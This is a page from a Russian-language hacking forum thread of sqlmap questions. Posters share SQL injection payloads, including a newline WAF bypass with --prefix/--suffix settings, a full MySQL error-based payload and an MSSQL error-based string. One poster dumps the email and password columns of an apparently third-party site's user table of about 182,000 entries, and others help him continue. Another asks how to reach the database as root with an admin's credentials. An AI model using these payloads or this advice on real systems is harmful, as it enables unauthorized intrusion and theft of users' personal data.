HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Вопросы по SQLMap
   
Ответ
Страница 41 из 115 « Первая < 31 37 38 39 40 41 42 43 44 45 5191 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 12.05.2017, 14:01
brown
Участник форума
Регистрация: 16.10.2016
Сообщений: 189
Провел на форуме:
43449

Репутация: 1
По умолчанию
Такой вопрос сижу в бд под обычным юзерем.Есть лог пасс админа.Как подлючится к бд под рутом?
 
Ответить с цитированием

  #2  
Старый 12.05.2017, 14:03
t0ma5
Постоянный
Регистрация: 10.02.2012
Сообщений: 830
Провел на форуме:
300820

Репутация: 90


По умолчанию
Цитата:
Сообщение от Xsite  

Кхм , можешь обьяснить на примере самой обычной скули ,как правильно юзать --prefix --suffix
предположим есть скуль вида

Код:
?id=7') union select 1,2,3,4
waf блокирует запрос, но проверка не проверяет что строка многострочная, добавляем перенос строки %0A

Код:
?id=7')%0A union select 1,2,3,4
символы комментариев запрещены, а нам надо как то корректно закрыть запрос(открытую скобку), добавляем

Код:
?id=7')%0A union select 1,2,3,4 and 1=('1
чтобы объяснить это скульмапу используем

--prefix="')%0A" --suffix="and 1=('1"

примерно так, в общем prefix и suffix нужны для кастомизации запроса, prefix - вначале, suffix - в конце
 
Ответить с цитированием

  #3  
Старый 13.05.2017, 13:11
MollizZz
Новичок
Регистрация: 20.02.2016
Сообщений: 10
Провел на форуме:
2307

Репутация: 0
По умолчанию
Привет всем. Подскажите. Сегодня столкнулся с этим:

.SpoilerTarget" type="button">Spoiler: Pass???

Как можно это победить?
 
Ответить с цитированием

  #4  
Старый 14.05.2017, 11:53
brown
Участник форума
Регистрация: 16.10.2016
Сообщений: 189
Провел на форуме:
43449

Репутация: 1
По умолчанию
Цитата:
Сообщение от MollizZz  

Привет всем. Подскажите. Сегодня столкнулся с этим:
Spoiler: Pass???

Как можно это победить?
charset
 
Ответить с цитированием

  #5  
Старый 14.05.2017, 11:55
brown
Участник форума
Регистрация: 16.10.2016
Сообщений: 189
Провел на форуме:
43449

Репутация: 1
По умолчанию
[09:52:37] [INFO] testing connection to the target URL

[09:52:37] [DEBUG] declared web page charset 'utf-8'

[09:52:37] [CRITICAL] not authorized, try to provide right HTTP authentication type and valid credentials (401)

[09:52:37] [WARNING] HTTP error codes detected during run:

401 (Unauthorized) - 1 times

Такая трабла,нашел скулю бурпом [ JSON parameter] причем бурп не видит никакой аундефикации и тд.пробую крутануть мапом вот такая ошибка.Кто сталкивался?Что делать?
 
Ответить с цитированием

  #6  
Старый 16.05.2017, 21:13
MollizZz
Новичок
Регистрация: 20.02.2016
Сообщений: 10
Провел на форуме:
2307

Репутация: 0
По умолчанию
Суть проблемы. Лью хороший сайт. Льется медленно, но уверенно

Периодически останавливаю и проверяю. Прошло уже процентов 20

Но нет данных с колонки "mail"



Собственно вопрос. Бывает так, что сначала сливает пассы, а потом мыла?

p.s. Пишет так же такое: [WARNING] reflective value(s) found and filtering out и стоит на месте

Код:
Parameter: #1* ((custom) POST)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: search=if(now()=sysdate(),sleep(0),0)/'||(SELECT 'YgBm' FROM DUAL WHERE 2861=2861 AND (SELECT 1089 FROM(SELECT COUNT(*),CONCAT(0x7170627671,(SELECT (ELT(1089=1089
,1))),0x71716b7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a))||''XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"/
---
[12:21:59] [INFO] testing MySQL
[12:21:59] [INFO] confirming MySQL
[12:21:59] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.4.45
back-end DBMS: MySQL >= 5.0.0
[12:21:59] [INFO] fetching entries of column(s) 'email' for table 'user' in database 'SITE.COM'
[12:21:59] [INFO] the SQL query used returns 182215 entries
due to huge table size do you want to remove ORDER BY clause gaining speed over consistency? [y/N] N
[12:21:59] [INFO] starting 10 threads
[12:22:00] [INFO] heuristics detected web page charset 'windows-1252'
[12:22:00] [WARNING] reflective value(s) found and filtering out
 
Ответить с цитированием

  #7  
Старый 17.05.2017, 13:46
brown
Участник форума
Регистрация: 16.10.2016
Сообщений: 189
Провел на форуме:
43449

Репутация: 1
По умолчанию
Цитата:
Сообщение от MollizZz  

Суть проблемы. Лью хороший сайт. Льется медленно, но уверенно
Периодически останавливаю и проверяю. Прошло уже процентов 20
Но нет данных с колонки "mail"

Собственно вопрос. Бывает так, что сначала сливает пассы, а потом мыла?
p.s. Пишет так же такое: [WARNING] reflective value(s) found and filtering out и стоит на месте
Код:
Parameter: #1* ((custom) POST)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: search=if(now()=sysdate(),sleep(0),0)/'||(SELECT 'YgBm' FROM DUAL WHERE 2861=2861 AND (SELECT 1089 FROM(SELECT COUNT(*),CONCAT(0x7170627671,(SELECT (ELT(1089=1089
,1))),0x71716b7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a))||''XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"/
---
[12:21:59] [INFO] testing MySQL
[12:21:59] [INFO] confirming MySQL
[12:21:59] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.4.45
back-end DBMS: MySQL >= 5.0.0
[12:21:59] [INFO] fetching entries of column(s) 'email' for table 'user' in database 'SITE.COM'
[12:21:59] [INFO] the SQL query used returns 182215 entries
due to huge table size do you want to remove ORDER BY clause gaining speed over consistency? [y/N] N
[12:21:59] [INFO] starting 10 threads
[12:22:00] [INFO] heuristics detected web page charset 'windows-1252'
[12:22:00] [WARNING] reflective value(s) found and filtering out
Нет.Занчит в бд нет Емайлов
 
Ответить с цитированием

  #8  
Старый 17.05.2017, 13:46
brown
Участник форума
Регистрация: 16.10.2016
Сообщений: 189
Провел на форуме:
43449

Репутация: 1
По умолчанию
'%2b(select convert(int%2cCHAR(52)%2bCHAR(67)%2bCHAR(117)%2bCH AR(77)%2bCHAR(72)%2bCHAR(107)%2bCHAR(116)%2bCHAR(1 12)%2bCHAR(80)%2bCHAR(80)%2bCHAR(116)) FROM syscolumns)%2b'

В чем может быть проблема?

Обычный еррорбасед
 
Ответить с цитированием

  #9  
Старый 17.05.2017, 13:48
MollizZz
Новичок
Регистрация: 20.02.2016
Сообщений: 10
Провел на форуме:
2307

Репутация: 0
По умолчанию
Цитата:
Сообщение от brown  

Нет.Занчит в бд нет Емайлов
Нет. В БД есть мыла. Ковырял в командах и в какой то момент начало их лить и сразу будто что то остановило дальнейший слив. Они как то защищены. И регистрация на этом сайте не возможна без почты
 
Ответить с цитированием

  #10  
Старый 17.05.2017, 14:01
RWD
Участник форума
Регистрация: 25.04.2013
Сообщений: 153
Провел на форуме:
56255

Репутация: 2
По умолчанию
Цитата:
Сообщение от MollizZz  

Нет. В БД есть мыла. Ковырял в командах и в какой то момент начало их лить и сразу будто что то остановило дальнейший слив. Они как то защищены. И регистрация на этом сайте не возможна без почты
типичный лимит запросов в минуту.
 
Ответить с цитированием
Ответ
Страница 41 из 115 « Первая < 31 37 38 39 40 41 42 43 44 45 5191 > Последняя »



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.